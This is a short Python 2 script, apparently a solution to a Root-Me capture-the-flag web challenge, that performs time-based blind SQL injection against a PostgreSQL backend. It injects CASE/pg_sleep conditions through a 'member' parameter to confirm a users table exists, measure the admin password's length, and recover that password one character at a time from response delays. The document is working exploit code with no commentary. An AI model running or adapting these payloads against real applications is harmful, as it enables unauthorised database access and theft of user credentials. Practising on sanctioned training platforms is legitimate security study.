Blind injection

blind.py

#!/usr/bin/env python

import requests

baseurl = 'http://challenge01.root-me.org/web-serveur/ch40/'
inject = '1; select case when %s then pg_sleep(15) else pg_sleep(0) end--'

cond1 = '(chr(%d) = substr((select password from users where username = $$admin$$), %d, 1))'
cond2 = '((select chr(117)||chr(115)||chr(101)||chr(114)||chr(115)) in (select table_name from information_schema.tables))'
cond3 = '(%d < (select char_length((select password from users where username = $$admin$$))))'

#r = requests.get(baseurl, params=payload);

def test():
    payload = {'action' : 'member', 'member' : inject % cond2}
    r = requests.get(baseurl, params=payload)
    print r.url
    print r.elapsed.total_seconds()

    return 0

def length():
    cond = cond3 % 12
    payload = {'action' : 'member', 'member' : inject % cond}
    r = requests.get(baseurl, params=payload)
    print r.url
    print r.elapsed.total_seconds()

    return 0

#45
def password():
    col = ""

    for i in range(1, 14):
        print 'i=' + str(i)

        j = 32
        loop = True

        while j <= 176 and loop:
            # '(chr(%d) = substr((select table_name from information_schema.tables where table_schema not in ($$information_schema$$, $$pg_catalog$$)), %d, 1))'
            cond = cond1 % (j, i)
            payload = {'action' : 'member', 'member' : inject % cond}

            r = requests.get(baseurl, params=payload)
            #print r.elapsed.total_seconds()
            if r.elapsed.total_seconds() > 2.4:
                loop = False
                col = col + chr(j)
                #print j
                print col

            j = j+1

#print length()
print password()
#print test()